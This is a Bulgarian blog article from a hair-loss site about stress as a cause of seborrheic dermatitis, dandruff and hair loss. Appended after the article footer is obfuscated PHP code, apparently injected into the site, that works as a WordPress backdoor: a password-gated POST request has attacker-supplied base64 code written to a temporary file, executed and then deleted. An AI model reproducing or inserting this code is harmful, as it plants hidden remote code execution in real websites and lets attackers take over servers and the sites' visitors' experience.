Може ли стресът да причини себореен дерматит? | Косопад

Може ли стресът да причини себореен дерматит?

shampoan-sulfati

Повечето хора си мислят, че стресът се изразява само чрез нервност, тревожност, нарушение в концентрацията .

Но не е така. Има и физически симптоми като ускорен пулс, напрежение в мускулите, обилно потене, проблеми с кожата, най- често дерматит. Той може да се появи навсякъде по кожата ни, включително и скалпа.

Дерматит на скалпа се нарича себореен дерматит. Представлява възпаление на кожата на главата, съпроводено със сърбежи и лющене. Познаваме го най- вече като досадният пърхот. Но може да се усложни до микотична или бактериална инфекция.

Лошата новина е, че е хронично заболяване, т.е., редуват се периоди, в които изчезва и такива, в които се активизира.

parhot-saveti

Най- често се появява при хора между 30 и 50 години. Свързва се директно с косопада.

Правилната хигиена на косата, в съчетание с подходящи продукти, предписани от лекар, можете да се справите със симптомите.

Доказано е, че стресът причинява косопад. Стресът може да обърка хормоналния ни баланс и да отслаби имунната ни защита. Когато сме изложени продължително на стрес се произвежда много кортизол, който срива имунната ни система.

Кожата може да реагира много различно на стреса: поява на акне, уртикария, обилно потене, херпес. На ниво скалп може да се появят сърбежи, пърхот, косопад.

09. февруари 2015 13:44:49 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}